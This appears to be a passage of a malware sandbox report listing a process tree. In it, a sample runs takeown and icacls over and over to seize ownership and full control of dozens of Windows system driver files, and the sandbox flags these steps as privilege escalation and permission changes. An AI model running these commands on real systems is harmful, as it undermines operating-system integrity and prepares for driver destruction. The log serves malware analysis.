C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit2⤵PID:4036
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\irenum.sys3⤵PID:3292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\irenum.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit2⤵PID:3112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\isapnp.sys3⤵PID:3164
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit2⤵PID:3100
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdclass.sys3⤵PID:3744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdclass.sys /grant "Admin:F"3⤵PID:3924
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit2⤵PID:3696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\kbdhid.sys3⤵
- Possible privilege escalation attempt
PID:1396
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"3⤵PID:4028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit2⤵PID:3284
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ks.sys3⤵PID:3368
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ks.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit2⤵PID:3948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecdd.sys3⤵PID:3340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit2⤵PID:4040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksecpkg.sys3⤵PID:3332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksecpkg.sys /grant "Admin:F"3⤵PID:3368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit2⤵PID:2528
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ksthunk.sys3⤵
- Possible privilege escalation attempt
PID:3832
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"3⤵PID:3428
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit2⤵PID:3308
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lltdio.sys3⤵PID:3420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"3⤵PID:3404
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit2⤵PID:3464
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_fc.sys3⤵PID:3232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"3⤵PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit2⤵PID:3476
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas.sys3⤵PID:3800
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas.sys /grant "Admin:F"3⤵PID:3852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit2⤵PID:4012
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_sas2.sys3⤵
- Modifies file permissions
PID:3792
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit2⤵PID:3936
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\lsi_scsi.sys3⤵PID:3712
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"3⤵PID:2140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit2⤵PID:2412
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\luafv.sys3⤵PID:3668
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\luafv.sys /grant "Admin:F"3⤵PID:3728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit2⤵PID:3436
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mcd.sys3⤵
- Modifies file permissions
PID:3428
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"3⤵PID:3920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit2⤵PID:3424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\megasas.sys3⤵PID:3604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\megasas.sys /grant "Admin:F"3⤵PID:3576
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit2⤵PID:3880
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MegaSR.sys3⤵PID:3892
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MegaSR.sys /grant "Admin:F"3⤵PID:2292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit2⤵PID:3188
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\modem.sys3⤵PID:3348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\modem.sys /grant "Admin:F"3⤵PID:3160
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit2⤵PID:3368
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\monitor.sys3⤵PID:4048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"3⤵PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit2⤵PID:3712
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouclass.sys3⤵PID:3232
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouclass.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:1444
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit2⤵PID:3448
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mouhid.sys3⤵PID:4064
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mouhid.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit2⤵PID:2968
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mountmgr.sys3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3976
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mountmgr.sys /grant "Admin:F"3⤵PID:3452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit2⤵PID:3756
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpio.sys3⤵PID:2292
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpio.sys /grant "Admin:F"3⤵PID:3724
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpsdrv.sys && icacls C:\Windows\System32\drivers\mpsdrv.sys /grant "%username%:F" && exit2⤵PID:1396
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mpsdrv.sys3⤵PID:4028
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mpsdrv.sys /grant "Admin:F"3⤵PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxdav.sys && icacls C:\Windows\System32\drivers\mrxdav.sys /grant "%username%:F" && exit2⤵PID:3892
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxdav.sys3⤵
- Possible privilege escalation attempt
PID:3444
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxdav.sys /grant "Admin:F"3⤵PID:3944
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb.sys && icacls C:\Windows\System32\drivers\mrxsmb.sys /grant "%username%:F" && exit2⤵PID:3404
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb.sys3⤵PID:3744
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb.sys /grant "Admin:F"3⤵PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb10.sys && icacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "%username%:F" && exit2⤵PID:3560
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb10.sys3⤵PID:2560
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb10.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:3704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mrxsmb20.sys && icacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "%username%:F" && exit2⤵PID:3576
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mrxsmb20.sys3⤵PID:3840
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mrxsmb20.sys /grant "Admin:F"3⤵PID:4148
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msahci.sys && icacls C:\Windows\System32\drivers\msahci.sys /grant "%username%:F" && exit2⤵PID:3976
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msahci.sys3⤵PID:3900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msahci.sys /grant "Admin:F"3⤵PID:3556
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msdsm.sys && icacls C:\Windows\System32\drivers\msdsm.sys /grant "%username%:F" && exit2⤵PID:3348
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msdsm.sys3⤵
- Possible privilege escalation attempt
PID:3552
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msdsm.sys /grant "Admin:F"3⤵PID:4240
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msfs.sys && icacls C:\Windows\System32\drivers\msfs.sys /grant "%username%:F" && exit2⤵PID:3596
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msfs.sys3⤵PID:3708
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msfs.sys /grant "Admin:F"3⤵PID:3108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf && icacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "%username%:F" && exit2⤵PID:3768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf3⤵PID:3900
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MsftWdf_Kernel_01009_Inbox_Critical.Wdf /grant "Admin:F"3⤵PID:4216
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mshidkmdf.sys && icacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "%username%:F" && exit2⤵PID:3332
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mshidkmdf.sys3⤵PID:4160
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mshidkmdf.sys /grant "Admin:F"3⤵PID:4232
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msisadrv.sys && icacls C:\Windows\System32\drivers\msisadrv.sys /grant "%username%:F" && exit2⤵PID:4064
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msisadrv.sys3⤵PID:4168
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msisadrv.sys /grant "Admin:F"3⤵PID:4248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msiscsi.sys && icacls C:\Windows\System32\drivers\msiscsi.sys /grant "%username%:F" && exit2⤵PID:4120
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msiscsi.sys3⤵
- Possible privilege escalation attempt
PID:4276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msiscsi.sys /grant "Admin:F"3⤵PID:4308
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mskssrv.sys && icacls C:\Windows\System32\drivers\mskssrv.sys /grant "%username%:F" && exit2⤵PID:4180
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mskssrv.sys3⤵PID:4348
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mskssrv.sys /grant "Admin:F"3⤵PID:4408
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspclock.sys && icacls C:\Windows\System32\drivers\mspclock.sys /grant "%username%:F" && exit2⤵PID:4224
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspclock.sys3⤵PID:4416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspclock.sys /grant "Admin:F"3⤵PID:4472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mspqm.sys && icacls C:\Windows\System32\drivers\mspqm.sys /grant "%username%:F" && exit2⤵PID:4296
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mspqm.sys3⤵PID:4436
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mspqm.sys /grant "Admin:F"3⤵PID:4492
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\msrpc.sys && icacls C:\Windows\System32\drivers\msrpc.sys /grant "%username%:F" && exit2⤵PID:4356
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\msrpc.sys3⤵PID:4516
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\msrpc.sys /grant "Admin:F"3⤵PID:4572
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mssmbios.sys && icacls C:\Windows\System32\drivers\mssmbios.sys /grant "%username%:F" && exit2⤵PID:4372
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mssmbios.sys3⤵PID:4524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mssmbios.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mstee.sys && icacls C:\Windows\System32\drivers\mstee.sys /grant "%username%:F" && exit2⤵PID:4424
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mstee.sys3⤵
- Modifies file permissions
PID:4604
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mstee.sys /grant "Admin:F"3⤵PID:4660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MTConfig.sys && icacls C:\Windows\System32\drivers\MTConfig.sys /grant "%username%:F" && exit2⤵PID:4484
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\MTConfig.sys3⤵PID:4624
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\MTConfig.sys /grant "Admin:F"3⤵PID:4716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mup.sys && icacls C:\Windows\System32\drivers\mup.sys /grant "%username%:F" && exit2⤵PID:4540
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\mup.sys3⤵PID:4724
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\mup.sys /grant "Admin:F"3⤵PID:4780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndis.sys && icacls C:\Windows\System32\drivers\ndis.sys /grant "%username%:F" && exit2⤵PID:4580
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndis.sys3⤵PID:4680
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndis.sys /grant "Admin:F"3⤵PID:4752
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiscap.sys && icacls C:\Windows\System32\drivers\ndiscap.sys /grant "%username%:F" && exit2⤵PID:4652
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiscap.sys3⤵PID:4808
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiscap.sys /grant "Admin:F"3⤵PID:4876
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndistapi.sys && icacls C:\Windows\System32\drivers\ndistapi.sys /grant "%username%:F" && exit2⤵PID:4696
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndistapi.sys3⤵PID:4816
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndistapi.sys /grant "Admin:F"3⤵PID:4904
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndisuio.sys && icacls C:\Windows\System32\drivers\ndisuio.sys /grant "%username%:F" && exit2⤵PID:4768
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndisuio.sys3⤵PID:4856
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndisuio.sys /grant "Admin:F"3⤵PID:4920
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndiswan.sys && icacls C:\Windows\System32\drivers\ndiswan.sys /grant "%username%:F" && exit2⤵PID:4828
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndiswan.sys3⤵PID:4932
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndiswan.sys /grant "Admin:F"3⤵PID:5000
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ndproxy.sys && icacls C:\Windows\System32\drivers\ndproxy.sys /grant "%username%:F" && exit2⤵PID:4868
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ndproxy.sys3⤵PID:4980
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ndproxy.sys /grant "Admin:F"3⤵PID:5032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbios.sys && icacls C:\Windows\System32\drivers\netbios.sys /grant "%username%:F" && exit2⤵PID:4948
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbios.sys3⤵PID:5048
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbios.sys /grant "Admin:F"3⤵PID:5096
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netbt.sys && icacls C:\Windows\System32\drivers\netbt.sys /grant "%username%:F" && exit2⤵PID:4972
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netbt.sys3⤵PID:5056
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netbt.sys /grant "Admin:F"3⤵PID:5104
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\netio.sys && icacls C:\Windows\System32\drivers\netio.sys /grant "%username%:F" && exit2⤵PID:5040
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\netio.sys3⤵PID:4104
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\netio.sys /grant "Admin:F"3⤵
- Modifies file permissions
PID:3416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nfrd960.sys && icacls C:\Windows\System32\drivers\nfrd960.sys /grant "%username%:F" && exit2⤵PID:5112
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nfrd960.sys3⤵PID:3160
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nfrd960.sys /grant "Admin:F"3⤵PID:3552
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\npfs.sys && icacls C:\Windows\System32\drivers\npfs.sys /grant "%username%:F" && exit2⤵PID:772
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\npfs.sys3⤵PID:4192
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\npfs.sys /grant "Admin:F"3⤵PID:3888
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nsiproxy.sys && icacls C:\Windows\System32\drivers\nsiproxy.sys /grant "%username%:F" && exit2⤵PID:3420
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nsiproxy.sys3⤵
- Possible privilege escalation attempt
PID:4276
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nsiproxy.sys /grant "Admin:F"3⤵PID:4252
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ntfs.sys && icacls C:\Windows\System32\drivers\ntfs.sys /grant "%username%:F" && exit2⤵PID:3924
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ntfs.sys3⤵PID:4220
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ntfs.sys /grant "Admin:F"3⤵PID:4144
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\null.sys && icacls C:\Windows\System32\drivers\null.sys /grant "%username%:F" && exit2⤵PID:4212
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\null.sys3⤵PID:4416
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\null.sys /grant "Admin:F"3⤵PID:4532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvraid.sys && icacls C:\Windows\System32\drivers\nvraid.sys /grant "%username%:F" && exit2⤵PID:4060
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvraid.sys3⤵PID:4332
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvraid.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nvstor.sys && icacls C:\Windows\System32\drivers\nvstor.sys /grant "%username%:F" && exit2⤵PID:4116
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nvstor.sys3⤵PID:4420
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nvstor.sys /grant "Admin:F"3⤵PID:4452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\NV_AGP.SYS && icacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "%username%:F" && exit2⤵PID:4196
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\NV_AGP.SYS3⤵PID:4340
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\NV_AGP.SYS /grant "Admin:F"3⤵
- Modifies file permissions
PID:4300
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\nwifi.sys && icacls C:\Windows\System32\drivers\nwifi.sys /grant "%username%:F" && exit2⤵PID:4352
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\nwifi.sys3⤵PID:4524
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\nwifi.sys /grant "Admin:F"3⤵
- Possible privilege escalation attempt
PID:4376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ohci1394.sys && icacls C:\Windows\System32\drivers\ohci1394.sys /grant "%username%:F" && exit2⤵PID:4256
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\drivers\ohci1394.sys3⤵PID:4712
-
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\drivers\ohci1394.sys /grant "Admin:F"3⤵PID:4732
-
-
-
